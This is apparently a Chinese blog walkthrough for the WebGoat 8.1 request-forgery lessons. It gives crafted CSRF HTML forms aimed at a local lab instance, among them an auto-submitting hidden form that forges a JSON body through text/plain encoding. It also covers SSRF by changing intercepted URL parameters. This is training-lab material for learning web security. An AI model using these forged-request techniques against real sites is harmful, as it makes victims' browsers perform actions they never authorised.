WebGoatV8.1(A8 2013Request Forgery)详细过关教程
一、Cross-Site Request Forgeries
1.Basic Get CSRF Exercise
根据题目提示说有隐藏表单,找到代码,右击form标签,复制->整个html
黏贴到编辑器上面并且补全html代码 和action指定的url,保存后修改后缀为html
<html>
<body>
<form accept-charset="UNKNOWN" id="basic-csrf-get" method="POST" name="form1" target="_blank" successcallback="" action="http://192.168.3.88:8080/WebGoat/csrf/basic-get-flag"><input name="csrf" type="hidden" value="false"><input type="submit" name="submit"></form>
</body>
</html>
我这里为了方便没有用http,直接打开编写好的html文件提交,获得flag
2.Post a review on someone else’s behalf
这题和上一题的步骤也差不多
黏贴到编辑器上补齐,后改后缀名
<html>
<body>
<form class="attack-form" accept-charset="UNKNOWN" id="csrf-review" method="POST" name="review-form" successcallback="" action="http://192.168.3.88:8080/WebGoat/csrf/review"><input class="form-control" id="reviewText" name="reviewText" placeholder="a" type="text"><input class="form-control" id="reviewStars" name="stars" type="text"><input type="hidden" name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9"><input type="submit" name="submit" value="Submit review"></form>
</body>
</html>
打开后输入,提交。回到webgoat刷新一下,已经有新的评价出现
3.CSRF and content-type
这一题根据题目给出的提交表单进行构造html来提交表单。
而且提交的格式是xml,这里涉及到编码转化的问题,不过题目里面的here跳转的页面已经很好的帮我们解决这个问题,也就是添加一个属性
ENCTYPE="text/plain"
构造的html代码
<html><script>window.onload = function() {document.getElementById("submit").click();}</script> <body> <form class="attack-form" accept-charset="UNKNOWN" id="csrf-feedback" method="POST" preparedata="feedback" action="http://192.168.3.88:8080/WebGoat/csrf/feedback/message" contenttype="application/json" ENCTYPE="text/plain"><input type="hidden" name='{"name": "WebGoat","email":"webgoat@webgoat.org","content":"WebGoat is the best!!' value='"}'><input id="submit" type="submit" value="Submit request" style="display:none"/></form></body>
</html>
二、Server-Side Request Forgery
1.Change the URL to display Jerry
设置代理抓包
url值里面的tom改成jerry,放包。即可过关
2.Change the URL to display the Interface Configuration with ifconfig.pro
让我们改成使用ifconfig.pro接口,我们直接访问ifconfig.pro看看这个接口的整个url。有url就简单了
直接抓包改url的值就可以了
也可以直接在浏览器上面该value值提交
WebGoatV8.1(A8 2013Request Forgery)详细过关教程相关推荐
- WebGoatV8.1(A1Injection)详细过关教程
一.SQL Injection (intro) 1.What is SQL? 题目让我们查找Bob Franco的部门 基本的sql的查询语句:select 查询的字段 from 表名 where 筛 ...
- WebGoatV8.1(A3-A5)详细过关教程
一.Insecure Login 打开代理,点击login,发现登陆的账号和密码没加密,提交可过关. 二.xxe 1.Let's try 设置代理进行抓包,发现我们评论的内容是在用xml进行传递这时候 ...
- WebGoatV8.1(challenges)详细过关教程
一.Admin lost password 设置代理继续抓包,刷新题目本页面.抓取url路径为/WebGoat/challenge/logo的包,重放在回应包里面搜索admin找到账号和密码 登录拿到 ...
- Docker02 狂神Docker视频学习笔记 :【狂神说Java 哔哩哔哩】Docker最新超详细版教程通俗易懂
目录 0. 视频源 0. 学习网址 基础篇 1. Docker概述 1.1 Docker为什么出现? 1.2 Docker历史 1.3 Docker能干什么 2. Docker安装 2.1 Docke ...
- SSM框架——详细整合教程(Spring+SpringMVC+MyBatis)
登录 | 注册 收藏成功 确定 收藏失败,请重新收藏 确定 查看所有私信查看所有通知 暂没有新通知 想要绕过微信小程序开发中的坑吗?不妨来听这个,今晚8点,1小时帮你搞定! 14小时以前 CSDN日报 ...
- mysql为什么每天0点就装东西_MySQL的详细安装教程
1.安装之前需要注意的几点 建议不要安装最新版本,一般找mysql5.0系列版本即可: mysq1官网有.zip和.msi两种安装形式: zip是压缩包,直接解压缩以后使用的,需要自己配置各种东西:m ...
- mysql windows 管道连接,科技常识:Windows Server 2016 MySQL数据库安装配置详细安装教程...
今天小编跟大家讲解下有关Windows Server 2016 MySQL数据库安装配置详细安装教程 ,相信小伙伴们对这个话题应该也很关注吧,小编也收集到了有关Windows Server 2016 ...
- python安装了运行不了_python详细安装教程
本章开始,我们将详细介绍Python编程环境的搭建,工欲善其事必先利其器,所以我们这里先介绍python详细安装教程.由于Python是跨平台的,他可以运行在Windows.Linux.Mac等系统上 ...
- truffle详细使用教程
详细使用教程 选择以太坊客户端 编译智能合约 运行迁移 测试智能合约 用 JavaScript 编写测试脚本 编写 Solidity 测试脚本 与智能合约交互 使用 EthPM 包管理工具 调试智能合 ...
最新文章
- 浪潮各机型前面板指示灯含义
- 深入Java泛型(一):作用与定义
- dg oracle 切换模式_oracle dg切换操作示例
- express+mongodb+vue实现增删改查-全栈之路
- C语言中的“”和“”
- 第四章、epub文件处理 -- epub文件内部组成
- USB 3.0、USB 3.1到底什么区别?
- HBase之CMS GC调优
- 项目知识学习篇———PostgreSQL数据库
- 图(一):图的邻接表表示
- 安装centos 6.5
- 小程序中添加客服按钮contact-button
- 白话区块链:区块链对普通大众的影响及其未来
- Ubuntu登陆不进去输入密码后黑屏又返回登陆界面
- matlab syms符号变量
- FreeCAD新手入门
- excel转word_PDF一键转Word、转Excel、转PPT、转Html、转图片软件
- 天道酬勤系列之Python 希尔排序
- HLOJ 1936 铺满方格
- ADB-adb命令安装app